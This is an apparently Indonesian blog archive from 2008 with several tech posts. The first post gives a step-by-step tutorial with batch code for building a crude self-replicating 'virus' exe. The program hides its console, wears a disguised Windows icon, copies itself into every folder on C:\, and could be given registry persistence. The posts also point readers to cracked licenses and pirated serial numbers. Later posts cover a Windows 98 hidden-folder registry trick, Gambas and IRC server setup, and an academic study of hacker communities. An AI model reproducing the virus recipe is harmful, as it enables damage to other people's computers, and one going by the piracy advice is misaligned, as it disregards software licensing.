Inbox InBox.{00020D75-0000-0000-C000-000000000046}

membuat semacam virus

2008-06-07T04:48:00.000-07:00

Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.
Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .

Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d” ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.

Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “

sumber:http://www.jasakom.com/article.aspx?ID=761

Membuat Folder Hidden Agar Tetap Hidden pada Windows 98

2008-06-07T04:46:00.002-07:00

Membuat Folder Hidden Agar Tetap Hidden pada Windows 98
(Pengirim : Endrias)

Folder yang hidden bisa dilihat jika folder option-nya dipilih pada show all.
Agar folder yang hidden tetap hidden/tidak tampak, aku ada sedikit tips :
gunakan regedit
pada key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
explorer\Advanced\Folder\Hidden\SHOWALL

rubah RegPath

misalnya
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
ganti dengan
Software\Microsoft\Windows\CurrentVersion\Explorer\Advancedd

Dengan itu pilihan radio button pada folder option akan tetap pada pilihan hidden. Selamat mencoba!

Membuat aplikasi shutdown di linux menggunakan Gambas

2008-06-07T04:46:00.001-07:00

Terasa asing memang ketika kita berkenalan dengan lingkungan yang baru, membuat kita tidak banyak berbicara dan bertindak, karena peraturan yang berlaku pada lingkungan baru ini berbeda dengan lingkungan kita yang lama. Hal ini menganalogikan kita kepada sistem operasi linux (sebagai lingkungan baru) dan windows (sebagai lingkungan yang lama).

Sistem operasi linux adalah sistem operasi yang bersifat gratisan dan Open Source, karena itu linux adalah jawaban dari permasalahan yang semakin banyaknya masyarakat menggunakan aplikasi bajakan. Keluarnya UU HAKI di Indonesia membuat perubahan yang mendorong pengguna komputer untuk meninggalkan software bajakan menuju ke software yang legal atau sah secara hukum.
Perubahan ini sangat dirasakan oleh para programmer windows yang biasa menggunakan bahasa permograman Visual Delphi atau Visual Basic. Mungkin untuk programmer Delphi tidak begitu mendapat kesulitan untuk membuat program di atas flatform linux karena keluarga Borland telah menyediakan paket pemrograman Kylix yang berjalan di atas flatform Linux yang mempunyai bahasa hampir sama dengan Delphi yang berjalan di atas flatform Windows. Bagaimana dengan nasib programmer Visual Basic ? Anda tidak perlu cemas, walaupun microsoft tidak membuatkan paket pemrograman Visual Basic untuk linux, karena saat ini banyak bahasa pemrograman yang hampir sama dengan Visual Basic di buat. Salah satu contohnya adalah Gambas (http://gambas.sourceforge.net) . Bahasa pemrograman yang dibuat oleh Benoit Minisini mempunyai beberapa perbedaan dengan bahasa pemrograman yang lain, perbedaan itu adalah :
1. Projek gambas di simpan dalam satu direktori
2. Kompilasi sebuah projek hanya membutuhkan semua class (objek tambahan tidak dibutuhkan) , Setiap objek tambahan dari class di kompil terpisah ketika aplikasi di jalankan.
3. Secara normal, interpreter gambas hanyalah program pengolah kata biasa.
Program gambas saat ini telah di buat untuk berbagai versi linux, seperti Mandrake, Fedora, FreeBSD, QiLinux, Slackware, SuSE, Xandros dan lain-lainnya. Untuk menginstall gambas anda dapat mendownload source program dalam bentuk tar atau rpm di http://gambas.sourceforge.net. Setelah anda download ikuti ketik beberapa perintah dibawah ini pada terminal :
[biner@sc8-pr-shell1 biner]$ tar –zxvf gambas-1.0.2.tar.gz
[biner@sc8-pr-shell1 biner]# cd gambas-1.0.2
[biner@sc8-pr-shell1 biner]# ./configure
[biner@sc8-pr-shell1 biner]# make
[biner@sc8-pr-shell1 biner]# make install
[biner@sc8-pr-shell1 biner]# make clean && make distclean

Karena artikel terdapat gambar maka artikel lengkapnya dapat anda dapatkan di http://geocities.com/jogja_brainy/gambas.doc

Membangun server IRC

2008-06-07T04:45:00.001-07:00

Server IRC (selanjutnya kita sebut IRCD) merupakan server yang digunakan untuk chatting, dimana IRC merupakan salah satu layanan internet yang sangat populer. Salah satu server IRC yang terkenal yaitu DALnet, sebagian besar komunitas Indonesia berada pada server ini.

Pada kesempatan ini kita akan membangun IRCD sendiri menggunakan bahamut-1.8.3-release.tar.gz (dapat anda download di http://bahamut.dal.net). IRCD akan diinstall pada mesin Linux. Penulis menggunakan mesin linux yang diinstall pada sebuah virtual machine (VMware Workstation, yang dapat anda download di internet, beserta S/N nya, dengan bantuan google). VMware penulis install diatas Windows XP. Adapun tujuan menggunakan virtual machine ini adalah untuk bisa mencoba IRCD dari sisi server dan clientnya dalam 1 PC.

Resource yang diperlukan:
1. VMware Workstation
2. Linux
3. bahamut-1.8.3-release.tar.gz
4. ircservices
:: VMware Workstation, Bahamt dan ircservices dapat anda download di internet

Langkah-langkah secara umum:
1. Instalasi VMware
2. Instalasi Linux pada VMware
3. Konfigurasi DNS pada Linux
4. Konfigurasi postfix pada Linux
5. Instalasi IRCD
6. Konfigurasi IRCD
7. Instalasi ircservices

nb: karena keterbatasan ruang visualisasi kami tidak dpt menampilkan langkah 1-2

3. Konfigurasi DNS pada Linux
Untuk IRD dan Ircservices diperlukan 2 hostname yang berbeda yaitu irc.balihack.or.id untuk IRCD, dan services.balihack.or.id untuk ircservices. Untuk itu kita perlu melakukan konfigurasi DNS, diperlukan IP tambahan untuk masing-masing host, hal ini dapat dilakukan dengan menambah virtual ethernet, anda pada Linux dapat dilakukan konfigurasi pada /etc/sysconfig/network-scripts
dengan menambahkan ifcfg-eth0:0 ifcfg-eth0:1 dan seterusnya.

Contoh : ifcfg-eth0:0
MTU=""
NETMASK=255.255.255.0
ONPARENT=yes
BROADCAST=192.168.0.255
BOOTPROTO=none
IPADDR=192.168.0.21
NETWORK=192.168.0.0
ONBOOT=yes
DEVICE=eth0:1

Konfigurasi named.conf
Pada konfigurasi DNS ini kami menentukan ketentuan sebagai berikut:
Nameserver 1: ns1.or.id (192.168.0.21)
Nameserver 2: ns2.or.id (192.168.0.22)
192.168.0.23 irc.balihack.or.id
192.168.0.24 services.balihack.or.id
192.168.0.20 balihack.or.id, mesin Linux sebagai server
192.168.0.1 mesin Windows XP sebagai client

Tambahkan script berikut pada named.conf
zone "or.id" {
type master;
file "or.id.hosts";
};

zone "0.168.192.in-addr.arpa" {
type master;
file "db.0.168.192";
};

Buat file or.id.hosts dan db.0.168.192 pada direktori /var/named (tergantung tempat file yang anda tentukan pada named.conf). Contoh isi filenya sbb;

FILE: or.id.hosts
$TTL 1d
@ IN SOA ns1.or.id. ketut.balihack.or.id. (
2005010100 ; Serial
28800 ; Refresh
14400 ; Retry
3600000 ; Expire
86400 ) ; Minimum
IN NS ns1.or.id.
IN NS ns2.or.id.
IN A 192.168.0.11
IN A 192.168.0.12
IN MX 10 balihack.or.id. ? untuk mail

Balihack IN A 192.168.0.20
irc.balihack IN A 192.168.0.23 <-- untuk IRCD
services.balihack IN A 192.168.0.24 <-- untuk IRCservices
windows.balihack IN A 192.168.0.1

FILE: db.0.168.192
$TTL 1d
@ IN SOA ns1.or.id. ketut.balihack.or.id. (
2005010100 ; Serial
28800 ; Refresh
14400 ; Retry
3600000 ; Expire
86400 ) ; Minimum
IN NS ns1.or.id.
IN NS ns2.or.id.

21 IN PTR ns1.or.id.
22 IN PTR ns2.or.id.
20 IN PTR balihack.or.id.
23 IN PTR irc.balihack.or.id.
24 IN PTR services.balihack.or.id.
1 IN PTR windows.balihack.or.id.

** Sesuaikan dengan virtual ethernet yang yang ingin dipakai

Konfigurasi resolv.conf

Tambahkan nameserver
nameserver 192.168.0.21
nameserver 192.168.0.22

4. Konfigurasi postfix pada Linux
IRCservices memerlukan layanan mail untuk melakukan layanan yang memakai fasilitas mail. Misalnya untuk pengiriman code AUTH, atau SENDPASS.
Untuk itu diperlukan sebuah MTA (mail transfer agent), pada kesempatan ini kami memakai Postfix. Lakukan konfigurasi Postfix pada file /etc/postfix/main.cf
Seperti contoh sebagai berikut:

# These are only the parameters changed from a default install
# see /etc/postfix/main.cf.dist for a commented, fuller version of this file.

# These are changed by postfix install script
myhostname = balihack.or.id
readme_directory = /usr/share/doc/postfix-2.1.0/README_FILES
sample_directory = /usr/share/doc/postfix-2.1.0/samples
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
command_directory = /usr/sbin
manpage_directory = /usr/share/man
daemon_directory = /usr/lib/postfix
newaliases_path = /usr/bin/newaliases.postfix
mailq_path = /usr/bin/mailq.postfix
queue_directory = /var/spool/postfix
mail_owner = postfix

# User configurable parameters

inet_interfaces = all
mynetworks_style = host
delay_warning_time = 4h
smtpd_banner = $myhostname ESMTP $mail_name ($mail_version) (Mandrake Linux)
unknown_local_recipient_reject_code = 450
smtp-filter_destination_concurrency_limit = 2
lmtp-filter_destination_concurrency_limit = 2
smtpd_sasl_path = /etc/postfix/sasl:/usr/lib/sasl2

5. Instalasi IRCD
Jika DNS dan Postfix telah berjalan dengan benar, instalasi IRCD dapat dilakukan,
1. ekstrak file bahamut-1.8.3-release.tar.gz dengan perintah tar –zvxf bahamut-1.8.3-release.tar.gz
2. pindah ke direktori bahamut-1.8.3 (cd bahamut-1.8.3).
3. ketik ./configure
4. ketik make
5. ketik make install

6. Konfigurasi IRCD
Jika tidak terjadi kesalahan Instalasi IRCD telah berhasil anda lakukan dan membentuk sebuah direktori ircd. Pindah ke direktori ircd (cd ../ircd).
Adapun file-file yang terdapat dalam file tersebut adalah:
convert_conf*
example.conf
ircd*
ircd.motd
ircd.pid
mkpasswd*
opers.txt
reference.conf
template.conf

copy file example.conf ke ircd.conf dengan perintah cp example.conf ircd.conf
lakukan konfigurasi pada file ircd.conf sesuaikan dengan konfigurasi DNS anda

7. Instalasi ircservices
1. Ekstrak file ircservices-5.0.27.tar.gz (tar –zvxf ircservices-5.0.27).
2. Masuk kedirektori ircservices-5.0.27
3. Ketik ./configure
4. Ketik make
5. Ketik make install DEST=/home/IRC/ircservis ? Direktori dimana ircservices mau diinstall.
6. Masuk ke direktori diinstall, lakukan konfigurasi pada file example.ircservices.conf dan example.modules.conf, ubah nama masing-masing file dengan nama ircservices.conf dan modules.conf

Final Touch qe3:

1. Menghidupkan IRCD dan ircservices
2. Masuk ke direktori dimana IRCD diinstall
3. Untuk IRCD Ketik ./ircd –f nama file konfigurasi (contoh: ./ircd –f balihack.conf). Jika tidak terjadi kesalahan pada file konfigurasi akan tampak pesan sebagai berikut:
[ketut@balihack ircd]$ ./ircd -f balihack.conf

bahamut-1.8(03) booting...
Security related issues should be sent to coders@dal.net
All other issues should be sent to dalnet-src@dal.net

CONFIGFILE: balihack.conf
Configuration Loaded.

Ircd is now becoming a daemon.
[ketut@balihack ircd]$

4. Untuk ircservices Ketik ./ircservices, untuk mengecek apakah IRCD dan ircservices hidup gunakan perintah: ps x
[ketut@balihack services]$ ps x
PID TTY STAT TIME COMMAND
1755 ? S 0:00 sshd: ketut@pts/0
1756 pts0 S 0:00 -bash
1798 ? S 0:00 ./ircd -f balihack.conf <-- ircd hidup
1801 pts0 S 0:00 ./ircservices <-- ircservices hidup
1804 pts0 R 0:00 ps x
[ketut@balihack services]$

NB: Jika pada IRCD dan ircservises tidak hidup lakukan pengecekan pada file konfigurasinya masing-masing, pada ircservices dapat dilakukan pengecekan dengan melihat pesan kesalahan pada ircservices.log yang terletak satu direktori dengan modules.conf dan ircservices.conf

Jika Instalasi dan konfigurasi sudah benar anda dapat mencoba server IRC anda sendiri dengan mIRC dari Windows XP sebagai client. Selanjutnya server IRC dapat anda manfaatkan untuk uji coba script bot, psybnc, dll. Selamat Mencoba

Memahami Karakteristik Komunitas Hacker

2008-06-07T04:44:00.000-07:00

"Memahami Karakteristik Komunitas Hacker :
Studi Kasus pada Komunitas Hacker Indonesia"

oleh: Donny B.U., M.Si.*

=========
Pengantar
=========
Log In, Hack In, Go Anywhere, Steal Anything. Ungkapan tersebut terpampang mencolok di sampul VCD berjudul Swordfish, sebuah film keluaran Hollywood pada tahun 2001. Dalam film tersebut dikisahkan bagaimana seorang veteran hacker bernama Stanley Jobson (diperankan oleh Hugh Jackman) tergiur dengan iming-iming imbalan uang yang ditawarkan oleh Ginger (diperankan oleh Halle Berry) atas perintah Gabriel Shear (diperankan oleh John Travolta). Jobson yang kehidupannya nyaris bangkrut tersebut diperintah oleh Shear untuk membobol sekuriti komputer sebuah bank sentral. Melalui keahliannya meng-hacking, maka Shear berhasil memindahkan sejumlah nominal uang secara digital dari satu bank ke beberapa bank lainnya di dunia.

Apa yang digambarkan oleh film Swordfish tersebut sejatinya membiaskan makna hacker yang sesungguhnya. Pada film tersebut, hacker diidentikkan dengan seseorang yang bertangan dingin dalam mengutak-atik program komputer dan melakukan upaya-upaya penerobosan suatu sistem komputer tanpa otorisasi yang sah dengan tujuan untuk mengambil atau mencuri sesuatu. Cracker, adalah istilah yang paling tepat untuk menyebutkan profesi Jobson pada film tersebut. Sebelum kita mengupas lebih jauh tentang perbedaan hacker dan cracker, serta problematikanya di Indonesia, ada baiknya kita beberkan lebih lanjut beberapa dosa Hollywood (baca: Amerika) dalam membiaskan makna hacker dan cracker.

Kita ingat, pada tahun 1995 Hollywood mengeluarkan sebuah film berjudul Hackers, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan kisah anak-anak muda yang terobsesi menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Penembusan sistem keamanan tersebut merupakan salah satu syarat yang harus ditempuh oleh sekelompok anak muda tersebut jika ingin bergabung dalam sebuah kelompok hacker elit. Dalam film tersebut, Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.

Kemudian pada tahun yang sama keluar pula film berjudul The Net yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang, melalui jaringan Internet. Selanjutnya pada tahun 1999 diluncurkan film berjudul Take Down, mengangkat kisah nyata perburuan Kevin Mitnick (diperankan oleh Skeet Ulrich), pembobol sekuriti, oleh Tsutomo Shimomura (diperankan oleh Russel Wong), pakar sekuriti. Dalam film tersebut secara jelas diucapkan dan dituliskan bahwa Kevin Mitnick adalah seorang hacker yang melanggar hukum.

Meskipun Shimomura menegaskan kepada petugas FBI McCoy Rollins (yang diperankan oleh Tom Berenger) bahwa Mitnick adalah cracker sedangkan Shimomura adalah hacker, pada awal film tersebut tampak jelas bahwa media massa Amerika menyebut Mitnick sebagai seorang hacker. Uniknya, terdapat perdebatan norma di dalam film tersebut antara hacker dan cracker, antara Mitnick dan Shimomura. Karena pada dasarnya mereka berdua melakukan hal yang sama dalam penetrasi sekuriti. Bedanya, Mitnick melakukannya atas dasar kebebasan informasi, sedangkan Shimomura atas dasar tindakan perlindungan informasi.

Dengan keluarnya film-film versi industri Hollywood tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT. Media massa Amerika pun lebih sering menggunakan istilah hacker. Sekedar contoh, pada Newsweek edisi 21 Februari 2000, pada cover depan tertulis: "The Hunt for the Hackers. Hijacking the Net. How to Protect Yourself". Di dalam majalah tersebut, terdapat 10 halaman yang mengulas tentang sekuriti dan kebijakan pemerintah Amerika pasca serangan Distributed Denial of Service (DDoS) ke situs-situs ternama. Judul utama ke 10 halaman tersebut adalah "Hunting The Hackers".

Maka kesalah-kaprahan penggunaan terminologi hacker tersebut notabene adalah berawal dari negara kelahirannya sendiri, Amerika. Kemudian masyarakat dan media massa di Indonesia pun mau tidak mau melakukan hal yang sama, menggunakan terminologi hacker yang bias dengan terminologi cracker.

Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama sebelumnya.

Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Hal tersebut disebabkan karena pada saat itu untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut oleh media massa Amerika sebagai hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos.

Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan lima pelaku lainnya mendapatkan hukuman masa percobaan. Pada tahun yang sama keluar pula sebuah film berjudul War Games yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengkontrol persenjataan nuklir AS.

Menurut James O'Brien dalam bukunya Management Information System (McGraw-Hill, 1999), hacking didefinisikan sebagai sebuah perilaku obsesif dan atau tanpa otorisasi yang sah dalam menggunakan komputer atau sistem jaringan komputer dan pelakunya disebut dengan istilah hacker. Ditambahkan pula bahwa hacker ilegal, yang kerap mencuri dan atau merusak data atau program, mencuri kartu kredit hingga mengganti tampilan suatu situs di Internet disebut dengan istilah cracker, dan aktifitasnya disebut cracking.

Secara spesifik, Richard Mansfield dalam bukunya Hacker Attack (Sybex, 2000) mendefinisikan hacker sebagai seseorang yang memiliki keinginan untuk melakukan eksplorasi dan penetrasi terhadap sebuah sistem operasi dan kode komputer pengaman lainnya, tetapi tidak melakukan tindakan pengrusakan apapun, tidak mencuri uang atau informasi. Mansfield menambahkan bahwa cracker adalah sisi gelap dari hacker dan memiliki kertertarikan untuk mencuri informasi, melakukan berbagai macam kerusakan dan sesekali waktu juga melumpuhkan keseluruhan sistem komputer.

Hacker sebenarnya memiliki kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984. Kode etik hacker tersebut, yang kerap dianut pula oleh para cracker, adalah :

1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali
2. Segala informasi haruslah gratis
3. Jangan percaya pada otoritas, promosikanlah desentralisasi
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.

Mansfield menyatakan bahwa perbedaan terminologi antar hacker dan cracker terkadang menjadi bias dan hilang sama sekali dalam perspektif media massa dan di masyarakat umum. Bahkan para cracker juga tidak jarang menyebut diri mereka sebagai hacker sehingga menyebabkan citra hacking menjadi buruk. Pernyataan tersebut merupakan penguatan dari pendapat Christian Crumlish dalam bukunya The Internet Dictionary (Sybex, 1995) yang menyatakan bahwa masyarakat di luar komunitas Internet, baik media massa maupun masyarakat umum, lebih familiar menggunakan istilah hacker untuk setiap perilaku eksplorasi dan penetrasi sebuah sistem komputer yang dilakukan secara ilegal dan cenderung bersifat merugikan pihak lain.

Untuk selanjutnya, dalam artikel ini terminologi hacker yang akan dipakai akan mengacu kepada "seseorang yang melakukan penetrasi atau masuk ke dalam suatu sistem komputer tanpa otorisasi yang sah". Terminologi hacker yang dipakai tersebut merupakan terminologi yang lebih kerap digunakan oleh media massa dan dipahami masyarakat umum.

==============================
Hacker Sebagai Individu Sosial
==============================
Sebagai individu sosial, seorang hacker tidak pernah lepas dari proses interaksi sosial dengan hacker lainnya atau dengan komunitas hacker-nya. Interaksi sosial adalah suatu hubungan antara dua individu atau lebih, sehingga kelakuan individu yang satu mempengaruhi, mengubah atau memperbaiki kelakukan individu yang lain atau sebaliknya. Dari interaksi sosial tersebut maka akan terbentuklah suatu kelompok sosial.

Kelompok sosial adalah suatu unit sosial atau kesatuan sosial yang terdiri atas dua individu atau lebih yang telah mengadakan interaksi sosial yang cukup intensif dan teratur, sehingga di antara individu itu sudah terdapat pembagian tugas, struktur, dan norma-norma yang khas bagi kelompok itu. Komunikasi antara hacker dengan hacker lainnya menggunakan sebuah media komunikasi berbasis Internet.

Winn Schawartau dalam bukunya Information Warfare (Thunder's Mouth Press, 1996) menegaskan bahwa hacker merupakan salah satu jenis individu yang menggunakan Internet sebagai media komunikasi dan media interaksi sosial antar sesama hacker lainnya. Ditambahkan pula oleh Schawartau bahwa kelompok hacker merupakan sebuah subkultur dari masyarakat yang memiliki ketertarikan yang sama dalam hal elektronis (jaringan komputer di Internet) dan antar anggotanya saling terlibat secara mental (emosional). Menurut Howard Rheingold dalam bukunya The Virtual Community (The MIT Press, 2000), Internet merupakan sebuah peluang untuk menghadirkan kembali hubungan antar pribadi yang pada saat ini intensitasnya semakin berkurang.

Di dalam Internet, perbedaan gender, usia, bangsa dan penampilan fisik tidak menjadi soal, karena memang hal tersebut tidak bisa dilihat langsung. Itulah yang menyebabkan hacker tertarik untuk menggunakan Internet sebagai sarana komunikasi dan sekaligus membentuk suatu komunitas, yaitu lantaran Internet memungkinkan hacker dapat berinteraksi dengan pihak lain tanpa harus menunjukkan jati diri sebenarnya (anonimitas / anonimity).

Joel Best dan David Luckenbill dalam bukunya Organizing Deviance (Prentice Hall, 1994) menganalisa bahwa perilaku menyimpang hacker memiliki dua setting yaitu onstage dan backstage. Onstage adalah ketika masing-masing individu beraksi sendiri melakukan hacking, sedangkan backstage adalah saat ketika para pelaku sedang tidak melakukan hacking dan mereka berkumpul untuk saling bersosialisasi dan berkomunikasi.

Berangkat dari beberapa pemahaman di atas, maka artikel ini mencoba memaparkan intisari dari tesis penulis yang berjudul "Pola Komunikasi Dalam Kelompok Hacker Dan Hubungannya Dengan Kegiatan Hacking : Studi Kasus Pada Hacker Di Indonesia", dan telah dipertahankan di hadapan sidang penguji tesis program studi Ilmu Komunikasi program pascasarjana Universitas Indonesia (UI) pada tanggal 24 Januari 2002. Tesis penulis tersebut menggunakan metodologi kualitatif dengan tipe penelitian eksploratif untuk mendapatkan pemahaman tentang pola pola komunikasi dalam kelompok hacker dan hubungannya dengan kegiatan hacking. Penulis telah menggunakan Internet, khususnya aplikasi Internet Relay Chat (IRC) sejak tahun 1996 dan berprofesi sebagai wartawan bidang TI di media online Detikcom sejak Desember 1999 hingga November 2001.

Saat di Detikcom, penulis banyak melakukan pengamatan perilaku hacker dan menulis berita tentang aktifitas hacking, sehingga mendapatkan pemahaman yang cukup mendalam tentang bagaimana sebuah komunitas maya dapat terbentuk serta dinamika kelompok hacker di Indonesia. Kemudian penulis mulai intensif mengamati chat room para hacker ketika maraknya aktifitas hacking sepanjang tahun 2000 dan tahun 2001. Sebelum menentukan hacker mana yang tepat dan bersedia diwawancara sebagai data primer tesis, penulis melakukan observasi tahap awal ke beberapa chat room hacker, serta melakukan studi literatur tentang berita-berita kegiatan hacking yang dilakukan oleh hacker Indonesia.

Beberapa chat room hacker yang diobservasi antara lain chat room #Hackerlink, #AntiHackerlink, #IndoSniffing, #Jasakom, #Betalmostdone dan #K-Elektronik. Kemudian untuk studi literatur difokuskan pada berita-berita dan artikel-artikel tentang hacker Indonesia dan kegiatan hacking yang dimuat oleh media massa Indonesia. Akhirnya penulis menetapkan tujuh hacker Indonesia yang bersedia di wawancara secara intensif melalui e-mail. (nickname hacker kami samarkan - penulis).

================================================
Karakteristik Chatroom dan Komunitas Maya Hacker
================================================
Berdasarkan hasil analisa dari data-data yang telah dikumpulkan oleh penulis, terdapat fakta bahwa hacker yang memiliki atau bergabung dalam suatu kelompok hacker tertentu, ternyata menggunakan Internet Relay Chat (IRC) atau chatroom. Bukan tidak mungkin bahwa hacker yang tergabung dalam sebuah chatroom dalam jangka waktu tertentu, secara berkala dan konsisten, bisa membentuk sebuah kelompok hacker tertentu.

Nama kelompok hacker tersebut akan mengikuti nama chat roomnya, ataupun nama chatroom yang dipilih akan menyesuaikan dengan nama kelompok hacker tersebut. Nama dari sebuah chatroom akan mengidentifikasikan nama kelompok hacker tersebut, demikian pula sebaliknya, nama sebuah kelompok hacker akan mengidentifikasikan nama chatroom yang digunakan. Contohnya kelompok hacker AntiHackerlink, Jasakom dan K-Elektronik, masing-masing memiliki chatroom dengan nama #AntiHackerlink, #Jasakom dan #K-Elektronik. Ketiga chat room tersebut berada di sebuah server Internet global yang bernama DALnet.

Berikut ini adalah data-data teknis ketiga chatroom tersebut :
Info for #antihackerlink:
Founder : -------- (Anon@202.146.241.142)
Mode Lock : -m
Last Topic : http://www.research.att.com/sw/tools/uwin/ (zer0_c00l)
Description: ::..:: We Are Indonesia Hacker's Crew ::..::
Options : SecuredOps, Verbose, "Sticky" Topics
Memo Level : AOP
Registered : Sat 12/01/2001 09:53:08 GMT
Last opping: Sun 12/23/2001 09:46:56 GMT
*** End of Info ***

Info for #jasakom:
Founder : ---- (sdfgsdf@202.47.64.5Cool
Mode Lock : -i
Description: WWW.JASAKOM.COM
Memo Level : AOP
Registered : Tue 05/29/2001 02:30:10 GMT
Last opping: Sun 12/23/2001 09:42:37 GMT
-ChanServ- *** End of Info ***

Info for #k-elektronik:
Founder : ------------ (~XWindows@thugscript.net)
Mode Lock : +cnt-sipkR
Last Topic : | Kecoak Crew | the great way to learn (wellex)
Description: www.k-elektronik.org
URL : http://www.k-elektronik.org
Options : SecuredOps, Ident, Topic Lock(S)
Memo Level : SOP
Registered : Tue 12/04/2001 08:35:17 GMT
Last opping: Sun 12/23/2001 11:50:29 GMT
*** End of Info ***

Tampak jelas dalam data-data di atas mengenai nickname pendiri (founder), waktu didirikan (registered), deskripsi (description) chatroom, dan sebagainya. Sebuah chatroom dapat menjadi suatu perwujudan dari keberadaan sebuah kelompok sosial atau komunitas hacker. Kemampuan dan fungsi chatroom memang memungkinkan hal tersebut.

